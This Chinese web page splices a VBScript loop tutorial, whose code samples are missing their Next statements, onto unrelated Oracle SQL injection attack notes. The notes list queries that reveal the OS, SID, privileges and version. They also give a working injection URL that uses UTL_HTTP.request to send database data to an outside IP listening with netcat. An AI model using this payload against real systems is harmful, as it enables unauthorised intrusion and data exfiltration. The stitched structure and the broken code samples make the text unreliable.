我们来分析一下此段程序，我们的目的是要根据当前的月份打印一张表格，首先我们建立一个计数器“count”并将其值设为 1，然后我们用函数 month() 和 now() 得到当前的月份，最后建立循环，当 count 的值小于当前月份的值加 1 的时候，即显示月份值及一条横线并将 count 的值加 1，循环语句重复执行直到以上条件为假时退出循环。其中如果 count 大于 13 则用 exit do 立即退出循环。

Do Loop 语句还可以使用以下语法：

[statements][Exit Do]

[statements]Loop [{While | Until} condition]

While...Wend 语句是为那些熟悉其用法的`用户提供的。但是由于 While...Wend 缺少灵活性，所以建议最好使用 Do...Loop 语句。下面我们来看看 For Next 语句。For...Next 语句用于将语句块运行指定的次数，在循环中使用计数器变量，该变量的值随每一次循环增加或减少。

下面的示例将过程 MyProc 重复执行 50 次。For 语句指定计数器变量 x 及其起始值与终止值。Next 语句使计数器变量每次加 1。 Sub DoMyProc50Times()

Dim x

For x = 1 To 50

MyProc

End Sub

关键字 Step 用于指定计数器变量每次增加或减少的值。在下面的示例中，计数器变量 j 每次加 2。循环结束后，total 的值为 2、4、6、8 和 10 的总和。

Sub TwosTotal()

Dim j, total

For j = 2 To 10 Step 2

total = total + j

MsgBox “ 总和为 ” & total & “。”

End Sub

要使计数器变量递减，可将 Step 设为负值。此时计数器变量的终止值必须小于起始值。在下面的示例中，计数器变量 myNum 每次减 2。循环结束后，total 的值为 16、14、12、10、8、6、4 和 2 的总和。 Sub NewTotal()

Dim myNum, total

For myNum = 16 To 2 Step -2

total = total + myNum

MsgBox “ 总和为 ” & total & “。”

End Sub

Exit For 语句用于在计数器达到其终止值之前退出 For...Next 语句。因为通常只是在某些特殊情况下(例如在发生错误时)要退出循环，所以可以在 If...Then...Else 语句的 True 语句块中使用 Exit For 语句。如果条件为 False，循环将照常运行。

最后，让我们来看看 For Each...Next 语句 ,For Each...Next 循环与 For...Next 循环类似。For Each...Next 不是将语句运行指定的次数，而是对于数组中的每个元素或对象集合中的每一项重复一组语句。这在不知道集合中元素的数目时非常有用。它的语法如下： For Each element In group

[statements]

[Exit For]

[statements]Next [element]

篇7： Un Oracle注射笔记脚本安全

Oracle说明:

Oracle的注射攻击学习,可以归为:

a.基本猜解:

1. 数据库名的猜解,表名的猜解,字段的猜解,数据的猜解.等基本数据的猜解.(半折法)

2. union方式猜解

3. UTL_HTTP.request反弹数据猜解.(需能上网)

4. 其它方式的猜解,诸如把表段内容,update或insert入可以显示的字段里,诸如网页,然后读取获知.

b.高级攻击方式:

1. 数据库提权攻击,一般是利用函数漏洞,提升为DBA权限.(oracle的DBA相当于mssql的sa,为数据库的最高权限)

2. 导出shell攻击.

3. 利用数据库漏洞,执行系统指定.

c.数据库漏洞.

1. 远程溢出,本地提权等漏洞(我们只管exp)

2. 存在的配置方面的漏洞整理,诸如默认弱口令,以及得到弱口令之后,如何提权等原因.

第一部份:

===================基本信息的猜解=========================

说明:

Oracle会把一些有用的信息保存在系统表里面,诸如all_tables,所以注射时对这些表的猜解,可以获取到很多的基本信息.

获得操作系统版本:

select member from v$logfile where rownum=1

通过路径方式判断操作系统.如果出现c:,d:类的是windows,其它为*nix

查看sid:

select instance_name from v$instance

查询当前用户权限

select * from session_roles

当前数据库版本

select banner from sys.v_$version where rownum=1

服务器出口IP

用utl_http.request可以实现

服务器监听IP

select utl_inaddr.get_host_address from dual

当前连接用户

select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual

反弹方式:(本机:nc -vv -lp 8000)

www.target.com/servlet/bbs.Userdetail?sUserName=test' and UTL_HTTP.request('59.151.22.37:8000/'||(select instance_name from v$instance where rownum=1))=1--

==================基本信息的猜===========================

基本信息的猜解主要是方便后期的注射攻击.